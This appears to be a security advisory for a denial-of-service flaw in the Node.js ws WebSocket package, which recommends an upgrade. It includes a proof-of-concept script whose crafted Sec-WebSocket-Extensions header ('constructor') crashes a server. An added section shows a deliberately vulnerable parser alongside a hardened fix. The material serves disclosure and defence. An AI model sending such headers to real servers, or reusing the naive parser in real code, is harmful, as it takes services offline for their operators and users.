Denial of Service (DoS)
Vulnerable module: ws
Introduced through: ws@2.0.3
Detailed paths
Introduced through: blockchain-wallet-client@blockchain/My-Wallet-V3#c0bf5615c862fb8d7ec5e3f5031c2998b8ddc690 › ws@2.0.3
Remediation: Upgrade to ws@3.3.1.
Overview
ws is a simple-to-use WebSocket client, server and console for Node.js.
Affected versions of this package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.
PoC:
const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor'; // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
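The mechanism behind the crash, as an added example that is not ws's own code or part of this advisory: a minimal Sec-WebSocket-Extensions parser written in the plain-object style that breaks on Object.prototype names, beside a hardened version that uses prototype-less accumulators and a token check, wrapped in a negotiate() that turns parse failures into a 400 instead of an uncaught exception. Function names and sample headers are constructed for the illustration.

```javascript
// Added example, not code from ws or this advisory. Grammar (RFC 6455
// section 9.1): "ext1; param=val, ext2; flag". All names are constructed.

// Naive parser: plain object accumulators. A name such as 'constructor'
// resolves through Object.prototype to a Function, so the `=== undefined`
// guard is skipped and `.push` runs on a non-array: a TypeError that, if
// uncaught in the upgrade handler, takes the whole server process down.
function parseNaive(header) {
  const extensions = {};
  for (const offer of header.split(',')) {
    const [name, ...params] = offer.split(';').map((s) => s.trim());
    if (extensions[name] === undefined) extensions[name] = [];
    const parsed = {};
    for (const p of params) {
      const [k, v] = p.split('=');
      if (parsed[k] === undefined) parsed[k] = [];
      parsed[k].push(v === undefined ? true : v);
    }
    extensions[name].push(parsed);
  }
  return extensions;
}

// Hardened parser: prototype-less accumulators (Object.create(null)) so no
// header value can reach an inherited property, plus an RFC 7230 token
// check that rejects empty or malformed names instead of storing them.
const TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

function parseHardened(header) {
  const extensions = Object.create(null);
  for (const offer of header.split(',')) {
    const [name, ...params] = offer.split(';').map((s) => s.trim());
    if (!TOKEN.test(name)) throw new SyntaxError(`bad extension name "${name}"`);
    const parsed = Object.create(null);
    for (const p of params) {
      const [k, v] = p.split('=');
      if (!TOKEN.test(k)) throw new SyntaxError(`bad parameter name "${k}"`);
      (parsed[k] || (parsed[k] = [])).push(v === undefined ? true : v);
    }
    (extensions[name] || (extensions[name] = [])).push(parsed);
  }
  return extensions;
}

// Upgrade-handler pattern: a header that fails to parse is a client error
// (400 on the upgrade request), never an uncaught exception.
function negotiate(header) {
  try { return { status: 101, extensions: parseHardened(header) }; }
  catch (err) { return { status: 400, reason: err.message }; }
}
```

With the hardened parser an extension literally named "constructor" is just an unknown own-property key the server can ignore, and the ",;constructor" variant is rejected as a malformed (empty) extension name.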